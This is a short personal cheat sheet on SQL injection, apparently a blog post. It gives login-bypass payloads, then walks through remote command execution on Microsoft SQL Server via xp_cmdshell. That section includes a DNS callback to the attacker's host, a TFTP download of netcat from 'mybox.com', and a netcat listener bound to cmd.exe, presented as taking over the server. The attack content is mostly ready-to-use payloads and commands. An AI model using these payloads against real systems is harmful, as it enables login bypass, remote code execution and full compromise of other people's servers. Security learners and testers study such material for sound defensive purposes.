A small reference when testing and using SQL Injection.

Note: This is for my reference, so if there is not enough detail I apologize.

Testing For SQL Injection Vulnerabilities:

We want to see if the input is sanitized or checked, below is something you can insert into the form to check.

ba’ or 1=1–

Example:
User: ba’ or 1=1–
Pass: ba’ or 1=1–

Query Manipulation:

SELECT * FROM table WHERE user=’ba’

-TO-

SELECT * FROM table WHERE user=’ba’ or 1=1–

Other examples (Depending on how the query was written here are other options to try) :

‘ or ‘1’=’1
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘1’=’1
” or “1”=”1
‘) or (‘1’=’1

Note:( — ) Is only needed for MS SQL servers. The ( — ) will tell the server to ignore the rest of the query sometimes can replace with ( # ). This will make sure your signal quotes ( ‘ ) are in order. Also, if field is hidden you can run the form from your local box w/ the injection in it.

Remote Execution on MS SQL:

Now we know the server is vulnerable, while being nice, the above does not always allow us to bypass the login screen. Or we just may want to do something different. Here is an option.

Start a sniffer on a box you own:

# tcpdump udp and port 53 and victimhostname

Now make the victim do a DNS query against your box:

’; EXEC master..xp_cmdshell ‘nslookup mybox.com’ —

You will see the dns query in your tcpdump output. Which means the EXEC worked! Now you can do whatever you like. For demonstration purposes lets just upload NetCat and execute.

‘; EXEC master..xp_cmdshell ‘tftp –I mybox.com GET nc.exe c:\nc.exe’ —

Now execute netcat so it’s listening.

‘; EXEC master..xp_cmdshell ‘c:\nc.exe –l –p 9999 –e cmd.exe’ –-

Now if you know what to do the box is all yours!

Note: The ( ; ) will end the previous query and start the next. Also, if the ( ‘ ) is not working try a ( ” ).

Conclusion: This is very basic SQL injection. Since it is just a cheat sheet I did not want this to become to long. Later I will cover other topics such as info gathering from ODBC error messages, Column gathering, querying specific things, blind SQL injection.

Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf